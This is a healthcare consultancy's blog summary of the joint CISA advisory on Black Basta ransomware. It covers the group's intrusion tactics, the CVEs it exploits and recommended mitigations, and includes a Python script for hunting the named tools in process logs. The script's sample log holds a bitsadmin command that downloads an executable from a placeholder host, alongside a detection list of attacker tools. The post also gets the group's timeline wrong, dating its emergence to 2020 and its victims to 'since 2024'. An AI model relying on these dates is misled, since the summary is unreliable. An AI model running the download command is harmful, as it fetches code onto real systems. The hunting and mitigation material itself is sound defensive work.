Ascension Update: CISA Shares IOCs and Recommended Actions
A historic multi-agency alert from the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) urges all critical infrastructure entities to be on high alert: Black Basta has encrypted and stolen data from organizations in at least 12 of the 16 critical infrastructure sectors, including healthcare.
Black Basta has been identified as the threat actors behind the ongoing outages at Ascension and its hospitals across the U.S.
The group was first identified in April 2020 and operates as a ransomware-as-a-service (RaaS) variant. Its affiliates have disrupted operations at a wide range of businesses and critical infrastructure organizations worldwide, and more than 500 entities have fallen victim to Black Basta since 2024.
CISA has published a list of 44 indicators of compromise, about 45 network indicators, and about 30 file indicators, as well as known Black Basta Cobalt Strike domains. Healthcare network defenders should review the list in the joint advisory, #StopRansomware: Black Basta (CISA), and apply the recommended mitigations.
Further Considerations for Healthcare Entities
- To gain access to networks, the group relies on common initial-access tactics such as phishing and vulnerability exploitation, then applies double extortion: exfiltrating data before encrypting systems.
- Spear-phishing is the primary method Black Basta affiliates use to gain initial access, but the actors have also been known to use Qakbot.
- In February 2024, Black Basta began exploiting ConnectWise vulnerability CVE-2024-1709, as well as abusing valid credentials.
- To scan networks and conduct reconnaissance, the threat actors use the SoftPerfect network scanner (netscan.exe) and utilities with innocuous file names such as Intel or Dell, left in the root of the C:\ drive.
- For lateral movement, the actors use BITSAdmin, PsExec, and Remote Desktop Protocol (RDP); lesser-known tools observed for remote access and lateral movement include Splashtop, ScreenConnect, and Cobalt Strike beacons.
- The actors use the credential scraper Mimikatz for privilege escalation and have been observed exploiting the ZeroLogon (CVE-2020-1472 [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527 [CWE-269]) vulnerabilities for local and Windows Active Directory domain privilege escalation.
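A starting point for hunting the tooling listed above in process-creation telemetry, as an added example that is not part of the original alert or of CISA's published indicator list. The JSON-lines log shape, its field names, and the sample events are constructed for illustration; the tool names and the vendor-named cover binaries in the root of C:\ come from the advisory text above.

```python
"""Flag process-creation events matching the Black Basta tooling named in the advisory."""
import json
from pathlib import PureWindowsPath

# Attacker-brought tools the advisory names (lower-cased executable basenames).
BROUGHT_TOOLS = {"netscan.exe", "psexec.exe", "mimikatz.exe"}
# Built-in Windows binary the advisory names; flagged only with its file-transfer switch, since plain runs are common.
LOLBIN_SWITCHES = {"bitsadmin.exe": "/transfer"}
# Vendor-like cover names the advisory says are given to binaries dropped directly in C:\.
VENDOR_COVER = {"intel", "dell"}

def classify(image: str, cmdline: str) -> list[str]:
    """Return the advisory-derived reasons one process record is suspicious (empty if none)."""
    path = PureWindowsPath(image)
    name = path.name.lower()
    reasons = []
    if name in BROUGHT_TOOLS:
        reasons.append(f"attacker tool: {name}")
    if name in LOLBIN_SWITCHES and LOLBIN_SWITCHES[name] in cmdline.lower():
        reasons.append(f"lolbin with transfer switch: {name}")
    # Parent equal to the drive root means the file sits in C:\ itself; C:\Intel\... driver folders are not matched.
    if str(path.parent).lower() == "c:\\" and path.stem.lower() in VENDOR_COVER:
        reasons.append(f"vendor-named binary in drive root: {path.name}")
    return reasons

def hunt(log_lines: list[str]) -> list[dict]:
    """Parse JSON-lines process-creation events and return the flagged ones with their reasons."""
    hits = []
    for line in log_lines:
        event = json.loads(line)
        reasons = classify(event.get("image", ""), event.get("cmdline", ""))
        if reasons:
            hits.append({"ts": event["ts"], "host": event["host"], "image": event["image"], "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry) in a minimal Sysmon-like JSON-lines shape.
SAMPLE_LOG = [
    r'{"ts": "2024-05-09T08:01:12Z", "host": "WS01", "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"}',
    r'{"ts": "2024-05-09T08:14:03Z", "host": "WS01", "image": "C:\\Users\\jdoe\\Downloads\\netscan.exe", "cmdline": "netscan.exe /range:10.0.0.0/24"}',
    r'{"ts": "2024-05-09T08:20:41Z", "host": "WS01", "image": "C:\\Windows\\System32\\bitsadmin.exe", "cmdline": "bitsadmin /transfer job http://example.invalid/Intel.exe C:\\Intel.exe"}',
    r'{"ts": "2024-05-09T08:21:05Z", "host": "WS01", "image": "C:\\Intel.exe", "cmdline": "Intel.exe"}',
    r'{"ts": "2024-05-09T08:30:00Z", "host": "WS02", "image": "C:\\Intel\\Driver\\setup.exe", "cmdline": "setup.exe"}',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["ts"], hit["host"], hit["image"], "->", "; ".join(hit["reasons"]))
```

Run against the constructed log, the benign svchost and the driver installer under C:\Intel\ pass, while the scanner, the BITS transfer, and the vendor-named binary in the drive root are flagged.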
The alert stresses that healthcare and other critical infrastructure entities should apply these recommendations today to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Measures to mitigate ransomware and cyber threats include:
- Install updates for operating systems, software, and firmware as soon as they are released
- Require multi-factor authentication for as many services as possible
- Train users to recognize and report phishing attempts
- Secure remote access software by applying the recommended mitigations
- Make backups of critical systems and device configurations [CPG 2.R] so that devices can be repaired and restored
- Apply the mitigations from the joint #StopRansomware Guide
Full recommendations, as well as links to remediation guidance, can be found on CISA’s Stop Ransomware site.
First Health encourages all healthcare entities to review and adopt these guidelines, where appropriate. Reach out to our leadership team if you have any questions about next steps or prioritization. We’re here to help support your mission to protect patients.